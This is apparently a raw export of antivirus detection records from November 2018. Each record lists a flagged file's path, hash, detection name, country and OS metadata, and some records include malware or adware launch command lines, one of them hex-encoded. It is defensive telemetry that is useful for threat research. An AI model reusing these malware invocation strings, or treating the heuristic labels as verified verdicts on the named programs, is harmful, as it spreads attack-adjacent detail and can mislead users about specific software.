  Row(detection=Row(filename='rad7ecbe.tmp.exe', filepath='C:\\Documents and Settings\\X\\Local Settings\\Temp\\rad7ECBE.tmp.exe', filesize=192000, name='TR/Crypt.ZPACK.71063b.#M1.#R1'), hash='71063b91d8872098c2d6942af8d9e0d0d1346da19cb73a09110edac7295db7c1', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:17:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-055646-4e1c39ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01dbbab1\\AVSCAN-20181105-054924-2355A1B0\\AVSCAN-20181105-055646-4E1C39EE', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:56:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='$rpqex58.exe', filepath='C:\\$Recycle.Bin\\S-1-5-21-413689936-2620273476-227213018-1001\\$RPQEX58.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='abbf959ac30d23cf2882ec223966b0b8c30ae85415ccfc41a5924b29cd6bd4db', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-04T18:26:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215927-88014f79', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aa78dab4\\AVSCAN-20181104-215047-4793A06D\\AVSCAN-20181104-215927-88014F79', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:59:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-064012-bce52995', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4580d2bc\\AVSCAN-20181105-063846-B1E3D195\\AVSCAN-20181105-064012-BCE52995', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:40:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T00:22:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='updater_zip_res2017042888uu_new[1].exe', filepath='C:\\WINDOWS\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\Updater_zip_res2017042888uu_new[1].exe', filesize=576000, name='HEUR/AGEN.1030714.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline='-cmode:2D0069006E00740020002D00730069006C0065006E00740020002D006300750072006500690074002D007100720020002D00720070006300700072003A006E00700020002D00720070006300650070003A005C0070006900700065005C0031003000440034004100440036003200410020002D0064006C006C002D0...0065007800650020002D00610072006B0064006C006C002D006E0061006D0065003A005900480032004400560039003400610048004A00620076002E0064006C006C0020002D00610072006B006400610065006D006F006E002D00650070003A005C0070006900700065005C00310030004500380037004600380031003400', country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\122CD1B0-6EE3F0E6-5F423020-935C808E\\BvpKjqrM64Zdo.exe', parentsize=2393400, timestamp='2018-11-04T15:22:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='32ac5b4c0cbec7debc03e163bc0cf52f948f65fbfaea82c323aae971b83f56c8', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries31.10.2018-29.available\\Avira\\32AC5B4C0CBEC7DEBC03E163BC0CF52F948F65FBFAEA82C323AAE971B83F56C8', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='32ac5b4c0cbec7debc03e163bc0cf52f948f65fbfaea82c323aae971b83f56c8', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-04T08:26:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T19:29:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-145704-0869fc71', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_5b89e992\\AVSCAN-20181104-144427-80344E91\\AVSCAN-20181104-145704-0869FC71', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:59:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='qa_auth_server.dll', filepath='\\\\?\\C:\\wamp\\bin\\mysql\\mysql5.6.17\\lib\\plugin\\qa_auth_server.dll', filesize=172000, name='W32/Ramnit.C.#M1.#R1'), hash='2c949caf2891fad29609319a069b003fd7e62c1d558d699d49b863c24cebc03f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:40:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T13:53:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:00:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:56:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-160804-5dabab7d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_868ea106\\AVSCAN-20181104-160703-54C26916\\AVSCAN-20181104-160804-5DABAB7D', filesize=192000, name='HEUR/AGEN.1014163.#M1.#R1'), hash='4ad4aa15337e64c3737556187a28f047fe900c106b402e26f4dd0a4edc51c1e4', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:08:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fe9150942d2861a030ec70e780caa7c4.smp', filepath='\\\\192.168.10.10\\SHARED\\_tools\\runtime\\scan\\tmp_1978858331\\fe9150942d2861a030ec70e780caa7c4.smp', filesize=192000, name='HEUR/AGEN.1004975.#M1.#R1'), hash='875cb56dadf524d59c522362b61c881158cb2736093e75bfbd7cc2bfb4934305', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\tools\\http_server\\http_server.exe', parentsize=6242816, timestamp='2018-11-04T15:00:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='libcr64.dll', filepath='\\\\?\\C:\\Windows\\TEMP\\ae7f8f31\\libcr64.dll', filesize=128000, name='TR/AD.CoinMiner.eukdq.#M1.#R1'), hash='726a9f478aaed66f0e4168594f2662198e8856e7e0f4e79085cff7c397dcc083', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T09:24:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='noceduti.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1531919\\noceduti.exe', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline='\\\\\\/mhp \\\\\\/mds \\\\\\/mnt \\\\\\/ext:pilp \\\\\\/inst_loc=360,132,646,504 \\\\\\/RSF=680 \\\\\\/prod:b \\\\\\/aflt=wbf_vjvweqoh9bdfhjlsu9utb1we_18_44_10 \\\\\\/instlref=s5  \\\\\\/noadmin \\\\\\/nochrome \\\\\\/adt=tE1L1R1V2Y1L1Qzu0B0E0ByBtD0Dzz0DtCyDyEtBtCyByD0FtTtE1L1R1V1B1Q2ZzutBtDtCzztCtCtDyEtCyEyDtAyDyByByDtAtTtE1Q1G1Izu2Y1G1J1G1F2W1GtTtE1Q1G1I1M2YzuyD', country='PE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1531919\\noceduti.exe', parentsize=512000, timestamp='2018-11-04T19:57:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00000153', filepath='C:\\Windows\\Temp\\tmp00000258\\tmp00000153', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T13:58:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-043303-cb5a3769', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9be30e41\\AVSCAN-20181104-041222-17212D5D\\AVSCAN-20181104-043303-CB5A3769', filesize=896000, name='Adware/CrossRider.mrhba.#M1.#R1'), hash='b725dfdb3755335affe6ea33419d5c08308b81a1d82818623958e961c3de1254', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T01:33:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T20:25:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181102-211240-d3af2f9b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2eb1b43c\\AVSCAN-20181102-210813-AE62A200\\AVSCAN-20181102-211240-D3AF2F9B', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T20:12:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160633-22c98168', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7292aa3e\\AVSCAN-20181102-160338-11E800BF\\AVSCAN-20181102-160633-22C98168', filesize=228000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='aaaa60c55bf4c4663c2e749470786c4ece2fb2294a597d02c948c11b8305ce41', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:06:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-222057-90a95124', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221829-7A5CEC69\\AVSCAN-20181102-222057-90A95124', filesize=64000, name='TR/Agent.64000.117.#M1.#R1'), hash='832eb4a864185bf214144732067e7aeb1b157e4016f2acd118fd9246385742b8', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:20:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221436-57280493', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221436-57280493', filesize=64000, name='TR/Siggen.xihzp.#M1.#R1'), hash='a7ed3c6e720bab5155c6714d4501312d8a818f21f7aa39ca31a3c882eb00c6a5', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:14:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsi6743.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:14:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ftx global vector configuration tool.exe', filepath='\\\\?\\H:\\Microsoft Flight Simulator X\\ORBX\\FTX_VECTOR\\FTX GLOBAL VECTOR Configuration Tool.exe', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='f5e3e92f6562e56435f4a2bc50148cbd58c8d4ffbfb445dbdc2e998975d55abb', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:08:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='watermark.exe', filepath='C:\\Program Files\\Microsoft\\WaterMark.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='76713ebad8aaccef88cbe580ef0b1dc9c258ff0a21b4eb6680217469f0d1da33', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T18:10:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='150644-freeplay-final-rus-mafia2.exe', filepath='C:\\Documents and Settings\\X\\Local Settings\\Temp\\Rar$DRa0.363\\150644-freeplay-final-rus-mafia2.exe', filesize=17600000, name='HEUR/AGEN.1005068.#M1.#R1'), hash='e505fa50dcf2719cbdded64b50eeb327bec87e8e6b3a30b2a3fffc14971a97d8', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:13:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='visualboyadvance.exe', filepath='E:\\c\\Compressed\\VisualBoyAdvance.exe', filesize=2048000, name='W32/Small.L.#M1.#R1'), hash='e53e4338f45df25a8bed599ef90749cff5e310c99a6b057e992a2093383744cb', metadata=Row(cmdline='\\\\\\/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T22:51:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='67b4155e-cd9c-6e5e-7503-f45efddff361.exe', filepath='G:\\{1c2c5a2b-abfc-3445-f75b-90141c2f296d}\\67b4155e-cd9c-6e5e-7503-f45efddff361.exe', filesize=256000, name='TR/Qadars.DW.#M1.#R1'), hash='eeb05cb6449871a2c95dc56268ad0a29828a440b1bfe728ae9d8b7b178fcabf6', metadata=Row(cmdline='\\\\\\/c \\\\\\"{1c2c5a2b-abfc-3445-f75b-90141c2f296d}\\\\\\\\67b4155e-cd9c-6e5e-7503-f45efddff361.exe \'ا ب ت ث ج ح خ د ذ ر ز س ش ص ض ط ظ ع غ ف ق ك ل م ن ه و ي.doc\'\\\\\\"', country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\cmd.exe', parentsize=302592, timestamp='2018-11-02T18:41:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='$rc2mi91', filepath='C:\\$Recycle.Bin\\S-1-5-21-4263215575-3939616800-3868030206-1001\\$RC2MI91', filesize=320000, name='ADWARE/FileFinder.Gen7.#M300.#R603476'), hash='7502868e104aacb5e43d1b5a6a6342c9447e1ee224b943f92697be566487ebcf', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T16:34:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='grim-qt-v1.2.1.exe', filepath='h:\\grim-qt-v1.2.1.exe', filesize=24896000, name='SPR/Agent.9fdf39.#M1.#R1'), hash='9fdf3947705b39ed43f38747463992c3668cae612340049c71f4b4a630f12f51', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T12:44:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7b7345c9bbea08dbe1d0e1e135889af3bd8d9ddab34d2c14f956d638d209c429', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\7B7345C9BBEA08DBE1D0E1E135889AF3BD8D9DDAB34D2C14F956D638D209C429', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7b7345c9bbea08dbe1d0e1e135889af3bd8d9ddab34d2c14f956d638d209c429', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:22:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221757-7f5c9bdc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-221748-7E3FA1A7\\AVSCAN-20181102-221757-7F5C9BDC', filesize=512000, name='PUA/BitcoinMiner.#M1.#R1'), hash='ed2bf137cee94994bf53304ca1c1b17672d0543b8c7b124bce28a3199ff7e57e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T18:17:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-162344-0fbf4e7f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6ac14353\\AVSCAN-20181102-161826-D810725D\\AVSCAN-20181102-162344-0FBF4E7F', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:23:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='playzth.exe', filepath='C:\\Program Files (x86)\\PlayZTH\\PlayZTH.exe', filesize=9664000, name='HEUR/AGEN.1027942.#M1.#R1'), hash='9eb401544bfbd608b71acb6d99c2b17edcc27d0bebea3b8149a2b407e6d91af3', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T02:20:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7bd45c38082f1e95fe18cc0d662dd8534b4171512061b6c1544131cc0f53785b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-3\\7BD45C38082F1E95FE18CC0D662DD8534B4171512061B6C1544131CC0F53785B', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='7bd45c38082f1e95fe18cc0d662dd8534b4171512061b6c1544131cc0f53785b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:12:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cfp.exe', filepath='D:\\Tool\\Miracle 227A Loader By Vikas Bhadu\\Miracle Box 2.27A Crack\\Miracle Box 2.27A Crack\\TOOLS\\Blackberry\\cfp\\cfp.exe', filesize=15104000, name='W32/Ramnit.CD.#M1.#R1'), hash='c109eb9d57d215600ae384d7e1cd535d6f82ef0103f42858e8951980dc1fdd7d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Mozilla Firefox\\firefox.exe', parentsize=450512, timestamp='2018-11-02T04:37:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082744-8b81358d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-082615-784E182D\\AVSCAN-20181102-082744-8B81358D', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:30:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rarrepairtool.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\RarRepairTool.exe", filesize=64000, name='TR/Siggen.64000.7.#M1.#R1'), hash='c030b37c4066998c7686b51d6cd8690308eeeadbec7712a6ae6190b18fd40916', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:17:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-230115-ee59d695', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4b51c409\\AVSCAN-20181102-225428-C3FA83A6\\AVSCAN-20181102-230115-EE59D695', filesize=96000, name='PUA/FindWide.#M1.#R1'), hash='e6e84c26e6e540487262c987a40d0b375bc27032a101445842e8441bad6703cb', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:01:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='admin.exe', filepath='E:\\PENTA 14-09-2016\\admin.exe', filesize=6720000, name='W32/Almanahe.D.#M1.#R1'), hash='9f9c4216b3ab8471f0ffbdcd2556b8730d613cb1675bfa3271a287600294555f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-143651-ba84ff0e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_79cabe45\\AVSCAN-20181102-143553-B053454F\\AVSCAN-20181102-143651-BA84FF0E', filesize=1536000, name='TR/Dropper.Gen.#M1.#R1'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:39:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cacgfbde.htm', filepath='E:\\New Programms\\Samsung driver-\\MANUAL\\Samsung SCX-483x 5x3x Series\\turkish\\advanced\\CACGFBDE.htm', filesize=220000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='c074991c1952eaf7c4c8ce52af6078da4bb78db587a236c026f41ee5d6ac2ec7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:12:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151801-91603124', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7783ea80\\AVSCAN-20181102-052319-9E8D11B5\\AVSCAN-20181102-151801-91603124', filesize=192000, name='TR/AD.Ramnit.Y.#M1.#R1'), hash='ed84e7f971503a31cda4ca63ba9600a9acdea9afbc17eba20982f773fc9cad08', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:18:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101854-95ad0377', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-101854-95AD0377', filesize=64000, name='TR/Agent.gpono.#M1.#R1'), hash='a226c44141c53061f71957bc34dbfface47bd10230578a172e45e5b267b295b6', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:18:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062826-170f362d', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_210041d9\\AVSCAN-20181102-062658-0D5AC46F\\AVSCAN-20181102-062826-170F362D', filesize=1664000, name='TR/Crypt.EPACK.Gen2.#M1.#R1'), hash='8da0442adac0b3b343baaf0317f0a1cbadf761010e0fbc468cba615eee422458', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:28:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='meatholes.com_12.06.22.jackie.moore.xxx.imageset-yapg.rar', filepath='G:\\MeatHoles.com_12.06.22.Jackie.Moore.XXX.iMAGESET-YAPG-4\\.tmp\\MeatHoles.com_12.06.22.Jackie.Moore.XXX.iMAGESET-YAPG.rar', filesize=7296000, name='TR/Spy.Zbot.aim.#M1.#R1'), hash='d704fb7bfa98a7f4854acb7dec5614fca15180acc128a09197cd9b531ed1ad67', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Newshosting\\newshosting.exe', parentsize=349696, timestamp='2018-11-02T00:00:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='installe.', filepath='CLICK_HE.APP/CONTENTS/MACOS/INSTALLE.', filesize=196000, name='Adware/OSX.Genieo.kjvwd.#M0.#R0'), hash='e6fc333e96f2bf01b233da4c04eb648168ec1f8b12f53c11b61c24579404b6c8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:19:15Z'), dt=datetime.date(2018, 11, 2)),
